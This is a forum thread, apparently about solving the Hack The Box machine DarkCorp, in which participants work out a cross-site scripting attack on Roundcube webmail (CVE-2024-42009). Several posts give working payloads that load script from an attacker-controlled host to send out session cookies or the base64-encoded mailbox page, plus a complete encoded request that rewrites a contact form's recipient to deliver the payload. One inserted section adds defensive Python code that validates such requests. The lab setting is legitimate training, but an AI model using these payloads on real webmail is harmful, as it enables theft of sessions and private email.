DarkCorp Hack the Box Season 7 (Windows Insane)
by RedBlock - Saturday February 8, 2025 at 03:32 PM
#11
So the Security Engineer is not clicking any links or attachments; I guess we have to PoC one of the XSSes ourselves and send it to him.
Reply
#12
(Feb 08, 2025, 08:06 PM)USBTYPEA Wrote:
(Feb 08, 2025, 07:36 PM)peRd1 Wrote:
(Feb 08, 2025, 07:15 PM)4yhg5y72jffg820j3f Wrote:
You can change the recipient of the email in the /contact POST request, which will give you information about one more user.
Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.

I can't get it to work? Interesting.

(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc

Description

A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7

According to the description it won't work, but you could try it.

Why do you say it won't work? On this site they claim it works, only they don't specify a PoC:
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar
Reply
#13
(Feb 08, 2025, 08:06 PM)USBTYPEA Wrote:
(Feb 08, 2025, 07:36 PM)peRd1 Wrote:
(Feb 08, 2025, 07:15 PM)4yhg5y72jffg820j3f Wrote:
You can change the recipient of the email in the /contact POST request, which will give you information about one more user.
Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.

I can't get it to work? Interesting.

(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc

Description

A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7

According to the description it won't work, but you could try it.

http://drip.htb/index

In the Contact Us section, choose your email, capture the request with Burp, then instead of sending the message to support, change it to your mail.
Reply
#14
(Feb 08, 2025, 08:13 PM)jsvensson Wrote:
(Feb 08, 2025, 08:06 PM)USBTYPEA Wrote:
(Feb 08, 2025, 07:36 PM)peRd1 Wrote:
(Feb 08, 2025, 07:15 PM)4yhg5y72jffg820j3f Wrote:
You can change the recipient of the email in the /contact POST request, which will give you information about one more user.
Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.

I can't get it to work? Interesting.

(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc

Description

A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7

According to the description it won't work, but you could try it.

Why do you say it won't work? On this site they claim it works, only they don't specify a PoC:
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar

Okay, okay. I was just basing it on the CVE description, but you have to prove it. Besides, if someone has already demonstrated it but not given a PoC, it's just a matter of creating it.
Reply
#15
(Feb 08, 2025, 08:13 PM)jsvensson Wrote:
(Feb 08, 2025, 08:06 PM)USBTYPEA Wrote:
(Feb 08, 2025, 07:36 PM)peRd1 Wrote:
(Feb 08, 2025, 07:15 PM)4yhg5y72jffg820j3f Wrote:
You can change the recipient of the email in the /contact POST request, which will give you information about one more user.
Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.

I can't get it to work? Interesting.

(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc

Description

A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7

According to the description it won't work, but you could try it.

Why do you say it won't work? On this site they claim it works, only they don't specify a PoC:
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar


These work:

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+document.cookie})) foo=bar">
Foo
</body>

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+btoa(document.documentElement.innerHTML)}))  foo=bar">
  Foo
</body>

You have to be sure to change the 'content' variable to 'html' as well as the recipient to bcase.

However, Roundcube is set up to use HttpOnly cookies, and scraping the page doesn't seem to have anything. It's not as simple as stealing the cookie.
Reply
#16
(Feb 08, 2025, 08:17 PM)jonklem Wrote:
(Feb 08, 2025, 08:13 PM)jsvensson Wrote:
(Feb 08, 2025, 08:06 PM)USBTYPEA Wrote:
(Feb 08, 2025, 07:36 PM)peRd1 Wrote:
(Feb 08, 2025, 07:15 PM)4yhg5y72jffg820j3f Wrote:
You can change the recipient of the email in the /contact POST request, which will give you information about one more user.
Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.

I can't get it to work? Interesting.

(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc

Description

A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7

According to the description it won't work, but you could try it.

Why do you say it won't work? On this site they claim it works, only they don't specify a PoC:
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar


These work:

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+document.cookie})) foo=bar">
Foo
</body>

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+btoa(document.documentElement.innerHTML)}))  foo=bar">
  Foo
</body>

You have to be sure to change the 'content' variable to 'html' as well as the recipient to bcase.

However, Roundcube is set up to use HttpOnly cookies, and scraping the page doesn't seem to have anything. It's not as simple as stealing the cookie.

Where is the content var?
Reply
#17
Maybe the one mentioned here:

https://www.bleepingcomputer.com/news/se...edentials/

CVE-2024-37383

Reply
#18
(Feb 08, 2025, 08:17 PM)jonklem Wrote:
(Feb 08, 2025, 08:13 PM)jsvensson Wrote:
(Feb 08, 2025, 08:06 PM)USBTYPEA Wrote:
(Feb 08, 2025, 07:36 PM)peRd1 Wrote:
(Feb 08, 2025, 07:15 PM)4yhg5y72jffg820j3f Wrote:
You can change the recipient of the email in the /contact POST request, which will give you information about one more user.
Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.

I can't get it to work? Interesting.

(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc

Description

A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7

According to the description it won't work, but you could try it.

Why do you say it won't work? On this site they claim it works, only they don't specify a PoC:
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar


These work:

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+document.cookie})) foo=bar">
Foo
</body>

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+btoa(document.documentElement.innerHTML)}))  foo=bar">
  Foo
</body>

You have to be sure to change the 'content' variable to 'html' as well as the recipient to bcase.

However, Roundcube is set up to use HttpOnly cookies, and scraping the page doesn't seem to have anything. It's not as simple as stealing the cookie.
I think it's likely that an email address that we don't know will give us a credential for some XSS or email with some content.
Reply
#19
(Feb 08, 2025, 08:22 PM)0x2034 Wrote:
(Feb 08, 2025, 08:17 PM)jonklem Wrote:
(Feb 08, 2025, 08:13 PM)jsvensson Wrote:
(Feb 08, 2025, 08:06 PM)USBTYPEA Wrote:
(Feb 08, 2025, 07:36 PM)peRd1 Wrote: Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.

I can't get it to work? Interesting.

(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc

Description

A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7

According to the description it won't work, but you could try it.

Why do you say it won't work? On this site they claim it works, only they don't specify a PoC:
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar


These work:

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+document.cookie})) foo=bar">
Foo
</body>

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+btoa(document.documentElement.innerHTML)}))  foo=bar">
  Foo
</body>

You have to be sure to change the 'content' variable to 'html' as well as the recipient to bcase.

However, Roundcube is set up to use HttpOnly cookies, and scraping the page doesn't seem to have anything. It's not as simple as stealing the cookie.

Where is the content var?


When you intercept with Burp, change the request to look like this:
name=test&email=test%40test.com&message=%3Cbody+title%3D%22bgcolor%3Dfoo%22+name%3D%22bar+style%3Danimation-name%3Aprogress-bar-stripes+onanimationstart%3Ddocument.body.appendChild%28Object.assign%28document.createElement%28%27script%27%29%2C%7Bsrc%3A%27http%3A%2F%2F10.10.14.144%3A8000%2F%3Fc%3D%27%2Bbtoa%28document.documentElement.innerHTML%29%7D%29%29++foo%3Dbar%22%3E%0D%0A++Foo%0D%0A%3C%2Fbody%3E&content=html&recipient=bcase%40drip.htb
Reply
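The request above also shows what the server side of that contact form is failing to check. The following is an added example, not code from the box or from any poster in the thread: it decodes a POST body of the same shape (name, email, message, content, recipient) and returns the reasons a defender would reject it, namely a client-supplied recipient override, a non-text content type, and an on-event handler or style token smuggled inside another attribute's value, which is the pattern the thread's payload relies on. The allowed recipient address is an assumption.

```python
"""Server-side validation for a contact form posted as
name=...&email=...&message=...&content=...&recipient=...
Field names follow the request quoted in the thread; the policy is assumed."""
from html.parser import HTMLParser
from urllib.parse import parse_qs
import re

ALLOWED_RECIPIENT = "support@drip.htb"   # assumed: the form's only legitimate destination

# An on<event>= token anywhere. The interesting case is the token sitting inside
# another attribute's value (e.g. name="bar style=... onanimationstart=...").
# A sanitizer that reads that value as one opaque string sees no handler, while a
# browser that re-tokenises the markup does, so the value itself must be scanned.
EVENT_TOKEN = re.compile(r"\bon[a-z]+\s*=", re.I)
STYLE_TOKEN = re.compile(r"\bstyle\s*=|animation-name", re.I)


class HandlerScanner(HTMLParser):
    """Collects findings for real or smuggled event handlers in start tags."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:           # html.parser lowercases attr names
            if name.startswith("on"):
                self.findings.append(f"<{tag}>: event handler attribute {name}")
            elif value and EVENT_TOKEN.search(value):
                self.findings.append(f"<{tag}>: handler smuggled in {name} value")
            if name != "style" and value and STYLE_TOKEN.search(value):
                self.findings.append(f"<{tag}>: style smuggled in {name} value")


def validate_contact(body: str) -> list:
    """Return the reasons to reject a form body; an empty list means accept."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    reasons = []
    recipient = form.get("recipient", ALLOWED_RECIPIENT)
    if recipient.lower() != ALLOWED_RECIPIENT:      # never trust a client-chosen recipient
        reasons.append(f"recipient override to {recipient}")
    if form.get("content", "text") != "text":       # a contact form has no need for HTML
        reasons.append("non-text content type requested")
    scanner = HandlerScanner()
    scanner.feed(form.get("message", ""))
    return reasons + scanner.findings


# Constructed sample in the shape of the thread's request, with a benign alert() body.
SAMPLE = ("name=test&email=test%40test.com"
          "&message=%3Cbody+title%3D%22x%22+name%3D%22y+style%3Danimation-name%3Az"
          "+onanimationstart%3Dalert%281%29%22%3EHi%3C%2Fbody%3E"
          "&content=html&recipient=bcase%40drip.htb")
```

Running `validate_contact(SAMPLE)` yields four reasons: the recipient override, the HTML content type, and the handler and style tokens smuggled in the body tag's name attribute.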
#20
(Feb 08, 2025, 08:27 PM)jonklem Wrote:
(Feb 08, 2025, 08:22 PM)0x2034 Wrote:
(Feb 08, 2025, 08:17 PM)jonklem Wrote:
(Feb 08, 2025, 08:13 PM)jsvensson Wrote:
(Feb 08, 2025, 08:06 PM)USBTYPEA Wrote: I can't get it to work? Interesting.


Description

A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7

According to the description it won't work, but you could try it.

Why do you say it won't work? On this site they claim it works, only they don't specify a PoC:
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar


These work:

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+document.cookie})) foo=bar">
Foo
</body>

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+btoa(document.documentElement.innerHTML)}))  foo=bar">
  Foo
</body>

You have to be sure to change the 'content' variable to 'html' as well as the recipient to bcase.

However, Roundcube is set up to use HttpOnly cookies, and scraping the page doesn't seem to have anything. It's not as simple as stealing the cookie.

Where is the content var?


When you intercept with Burp, change the request to look like this:
name=test&email=test%40test.com&message=%3Cbody+title%3D%22bgcolor%3Dfoo%22+name%3D%22bar+style%3Danimation-name%3Aprogress-bar-stripes+onanimationstart%3Ddocument.body.appendChild%28Object.assign%28document.createElement%28%27script%27%29%2C%7Bsrc%3A%27http%3A%2F%2F10.10.14.144%3A8000%2F%3Fc%3D%27%2Bbtoa%28document.documentElement.innerHTML%29%7D%29%29++foo%3Dbar%22%3E%0D%0A++Foo%0D%0A%3C%2Fbody%3E&content=html&recipient=bcase%40drip.htb
in http://drip.htb/index#contact

Correct?
Reply